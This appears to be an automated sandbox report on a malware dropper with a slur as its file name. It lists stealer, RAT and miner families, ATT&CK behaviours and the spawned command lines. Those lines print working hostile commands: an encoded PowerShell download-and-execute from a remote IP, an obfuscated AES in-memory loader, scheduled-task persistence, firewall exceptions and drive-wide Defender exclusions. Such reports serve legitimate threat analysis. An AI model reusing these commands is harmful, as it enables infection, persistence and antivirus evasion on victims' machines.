Analysis Overview
SHA256
c26e2475ef60ba969bb66c9b464b498efb1da0bf7360ff7545c1db3b707bdbed
Threat Level: Known bad
The file niggers.exe was found to be: Known bad.
Malicious Activity Summary
AmmyyAdmin payload
Asyncrat family
RedLine
Lumma Stealer, LummaC
Njrat family
Vidar
xmrig
TA505
njRAT/Bladabindi
Detect Xworm Payload
Lumma family
Neshta
Xworm family
Detect Vidar Stealer
Quasar family
FlawedAmmyy RAT
Xworm
Ammyy Admin
Flawedammyy family
Modiloader family
Quasar payload
Detect Neshta payload
XMRig Miner payload
Metasploit family
Ta505 family
Ammyyadmin family
ModiLoader, DBatLoader
Redline family
Vidar family
AsyncRat
Xmrig family
MetaSploit
Neshta family
Quasar RAT
RedLine payload
ModiLoader Second Stage
Async RAT payload
Contacts a large (554) amount of remote hosts
Uses browser remote debugging
Modifies Windows Firewall
Stops running service(s)
Sets file to hidden
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Loads dropped DLL
.NET Reactor proctector
Checks computer location settings
VMProtect packed file
Executes dropped EXE
Power Settings
Network Service Discovery
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
AutoIT Executable
UPX packed file
Launches sc.exe
System Location Discovery: System Language Discovery
Program crash
Event Triggered Execution: Accessibility Features
Detects Pyinstaller
Access Token Manipulation: Create Process with Token
Unsigned PE
System Network Configuration Discovery: Internet Connection Discovery
Enumerates physical storage devices
NSIS installer
Gathers network information
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Scheduled Task/Job: Scheduled Task
Views/modifies file attributes
Kills process with taskkill
Suspicious use of AdjustPrivilegeToken
Opens file in notepad (likely ransom note)
Runs ping.exe
Runs net.exe
Delays execution with timeout.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-12-04 13:02
Signatures
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-04 13:02
Reported
2024-12-04 13:05
Platform
win10v2004-20241007-en
Max time kernel
15s
Max time network
161s
Command Line
Signatures
Ammyy Admin
AmmyyAdmin payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Ammyyadmin family
AsyncRat
Asyncrat family
Detect Neshta payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
FlawedAmmyy RAT
Flawedammyy family
Lumma Stealer, LummaC
Lumma family
MetaSploit
Metasploit family
ModiLoader, DBatLoader
Modiloader family
Neshta
Neshta family
Njrat family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
TA505
Ta505 family
Vidar
Vidar family
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xmrig family
Xworm
Xworm family
njRAT/Bladabindi
xmrig
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
ModiLoader Second Stage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Contacts a large (554) amount of remote hosts
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Stops running service(s)
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\niggers.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\AV.scr | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe | N/A |
Loads dropped DLL
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\GameBarPresenceWriter.exe | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\powercfg.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\AV.scr | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\svchost.com | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\niggers.exe
"C:\Users\Admin\AppData\Local\Temp\niggers.exe"
C:\Users\Admin\AppData\Local\Temp\niggers.exe
"C:\Users\Admin\AppData\Local\Temp\niggers.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\payload1.bat" "
C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"
C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe
"C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Noninteractive -windowstyle hidden -e UwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBTAGMAbwBwAGUAIABQAHIAbwBjAGUAcwBzACAALQBGAG8AcgBjAGUAOwAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAALQBiAG8AcgAgADMAMAA3ADIAOwAgAGkAZQB4ACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADcANgAuADEAMQAxAC4AMQA3ADQALgAxADMAOAAvAHUAcwBlAHIAcwB5AG4AYwAvAHQAcgBhAGQAZQBkAGUAcwBrAC8AXwByAHAAJwApACkAKQApAA==
C:\Users\Admin\Downloads\UrlHausFiles\AV.scr
"C:\Users\Admin\Downloads\UrlHausFiles\AV.scr" /S
C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe
"C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe"
C:\Users\Admin\Downloads\UrlHausFiles\COMSurrogate.exe
"C:\Users\Admin\Downloads\UrlHausFiles\COMSurrogate.exe"
C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe
"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\26.ps1"
C:\Users\Admin\Downloads\UrlHausFiles\skikda.exe
"C:\Users\Admin\Downloads\UrlHausFiles\skikda.exe"
C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe
"C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
C:\Users\Admin\Downloads\UrlHausFiles\241.exe
"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"
C:\Users\Admin\Downloads\UrlHausFiles\hercules.exe
"C:\Users\Admin\Downloads\UrlHausFiles\hercules.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4176 -ip 4176
C:\Users\Admin\Downloads\UrlHausFiles\241.exe
"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"
C:\Users\Admin\Downloads\UrlHausFiles\ddd.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ddd.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4176 -s 1004
C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe
"C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 776 -ip 776
C:\Users\Admin\Downloads\UrlHausFiles\shell.exe
"C:\Users\Admin\Downloads\UrlHausFiles\shell.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 752
C:\Users\Admin\Downloads\UrlHausFiles\payload.exe
"C:\Users\Admin\Downloads\UrlHausFiles\payload.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PowerShell" /tr "C:\Users\Admin\AppData\Roaming\PowerShell.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\1krecrypted.cmd" "
C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe
"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"
C:\Users\Admin\Downloads\UrlHausFiles\test28.exe
"C:\Users\Admin\Downloads\UrlHausFiles\test28.exe"
C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe
"C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\Downloads\UrlHausFiles\1krecrypted.cmd';$ddkL='TrhqWFanshqWFfohqWFrmhqWFFihqWFnalhqWFBlhqWFochqWFkhqWF'.Replace('hqWF', ''),'DDPxXecoDPxXmDPxXprDPxXessDPxX'.Replace('DPxX', ''),'MaysmqinysmqMysmqodysmqulysmqeysmq'.Replace('ysmq', ''),'ReiHEpadiHEpLiiHEpnesiHEp'.Replace('iHEp', ''),'GCqdUetCqdUCuCqdUrCqdUreCqdUntPCqdUrCqdUocCqdUesCqdUsCqdU'.Replace('CqdU', ''),'InAKLIvoAKLIkAKLIeAKLI'.Replace('AKLI', ''),'LoJqASadJqAS'.Replace('JqAS', ''),'CopyfqFyTyfqFoyfqF'.Replace('yfqF', ''),'FrvXuAomvXuABvXuAasvXuAe6vXuA4StvXuArvXuAinvXuAgvXuA'.Replace('vXuA', ''),'CxbdihxbdianxbdigxbdieExbdixtexbdinxbdisixbdioxbdinxbdi'.Replace('xbdi', ''),'EleVQPZmeVQPZntVQPZAtVQPZ'.Replace('VQPZ', ''),'CNQbureaNQbutNQbueDNQbuecrNQbuypNQbutorNQbu'.Replace('NQbu', ''),'EoUdqnoUdqtoUdqryoUdqPoUdqoioUdqnoUdqtoUdq'.Replace('oUdq', ''),'ScSRUplcSRUitcSRU'.Replace('cSRU', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($ddkL[4])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function rInUE($tsSXg){$AjjqB=[System.Security.Cryptography.Aes]::Create();$AjjqB.Mode=[System.Security.Cryptography.CipherMode]::CBC;$AjjqB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$AjjqB.Key=[System.Convert]::($ddkL[8])('N/y0OKPKBqPZJ+saNe6tgR7TAn10dih8XZ0HebZ+uEc=');$AjjqB.IV=[System.Convert]::($ddkL[8])('Ls3mytPz2eg1HzNec7G7VA==');$BtIij=$AjjqB.($ddkL[11])();$tfdFv=$BtIij.($ddkL[0])($tsSXg,0,$tsSXg.Length);$BtIij.Dispose();$AjjqB.Dispose();$tfdFv;}function UajxO($tsSXg){$coXbk=New-Object System.IO.MemoryStream(,$tsSXg);$PWDcH=New-Object System.IO.MemoryStream;$GMuYT=New-Object System.IO.Compression.GZipStream($coXbk,[IO.Compression.CompressionMode]::($ddkL[1]));$GMuYT.($ddkL[7])($PWDcH);$GMuYT.Dispose();$coXbk.Dispose();$PWDcH.Dispose();$PWDcH.ToArray();}$hqZyL=[System.IO.File]::($ddkL[3])([Console]::Title);$Hvhxu=UajxO (rInUE ([Convert]::($ddkL[8])([System.Linq.Enumerable]::($ddkL[10])($hqZyL, 5).Substring(2))));$LvPZo=UajxO (rInUE ([Convert]::($ddkL[8])([System.Linq.Enumerable]::($ddkL[10])($hqZyL, 6).Substring(2))));[System.Reflection.Assembly]::($ddkL[6])([byte[]]$LvPZo).($ddkL[12]).($ddkL[5])($null,$null);[System.Reflection.Assembly]::($ddkL[6])([byte[]]$Hvhxu).($ddkL[12]).($ddkL[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe
"C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe"
C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe
"C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe" -service -lunch
C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe
"C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe"
C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe
"C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe"
C:\Users\Admin\Downloads\UrlHausFiles\7rsuHCa.exe
"C:\Users\Admin\Downloads\UrlHausFiles\7rsuHCa.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4376 -ip 4376
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 568
C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe
"C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe"
C:\Users\Admin\Downloads\UrlHausFiles\downloader.exe
"C:\Users\Admin\Downloads\UrlHausFiles\downloader.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\blockHost\Ft5ffBENLVBQ0TxN99.vbe"
C:\Users\Admin\AppData\Roaming\PowerShell.exe
C:\Users\Admin\AppData\Roaming\PowerShell.exe
C:\Users\Admin\Downloads\UrlHausFiles\c1.exe
"C:\Users\Admin\Downloads\UrlHausFiles\c1.exe"
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"
C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe
"C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe"
C:\Users\Admin\Downloads\UrlHausFiles\winnit.exe
"C:\Users\Admin\Downloads\UrlHausFiles\winnit.exe"
C:\Users\Admin\Downloads\UrlHausFiles\rhnew.exe
"C:\Users\Admin\Downloads\UrlHausFiles\rhnew.exe"
C:\Users\Admin\Downloads\UrlHausFiles\GI59vO6.exe
"C:\Users\Admin\Downloads\UrlHausFiles\GI59vO6.exe"
C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe
"C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
C:\Users\Admin\Downloads\UrlHausFiles\gU8ND0g.exe
"C:\Users\Admin\Downloads\UrlHausFiles\gU8ND0g.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
C:\Users\Admin\Downloads\UrlHausFiles\powershell.exe
powershell ping 127.0.0.1; del gU8ND0g.exe
C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe"
C:\Users\Admin\Downloads\UrlHausFiles\tR7DLnB.exe
"C:\Users\Admin\Downloads\UrlHausFiles\tR7DLnB.exe"
C:\Users\Admin\AppData\Local\Temp\is-SCB84.tmp\ClientServices.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SCB84.tmp\ClientServices.tmp" /SL5="$202F8,965278,203776,C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C timeout /T 3 & "C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe" /VERYSILENT /SUPPRESSMSGBOXES
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe"
C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe"
C:\Windows\SysWOW64\timeout.exe
timeout /T 3
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat
"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"
C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe
"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\paste.ps1"
C:\Users\Admin\Downloads\UrlHausFiles\ew.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe" "SearchUII.exe" ENABLE
C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe" /VERYSILENT /SUPPRESSMSGBOXES
C:\Users\Admin\AppData\Local\Temp\is-OCRHC.tmp\ClientServices.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OCRHC.tmp\ClientServices.tmp" /SL5="$5031A,965278,203776,C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe" /VERYSILENT /SUPPRESSMSGBOXES
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\blockHost\mQaBLuUaoydrtjCUEEo9RzhnLMIcPb9fRdfVdNsoFovUVH.bat" "
C:\Windows\SysWOW64\regsvr32.exe
"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\HollowSwallow.dll"
C:\blockHost\msServerFontDriver.exe
"C:\blockHost/msServerFontDriver.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\HollowSwallow.dll' }) { exit 0 } else { exit 1 }"
C:\Users\Admin\Downloads\UrlHausFiles\9402.tmp.exe
"C:\Users\Admin\Downloads\UrlHausFiles\9402.tmp.exe"
C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe
"C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe"
C:\Users\Admin\AppData\Local\palladiums\translucently.exe
"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4DAE.tmp\4DAF.tmp\4DB0.bat C:\Users\Admin\Downloads\UrlHausFiles\9402.tmp.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
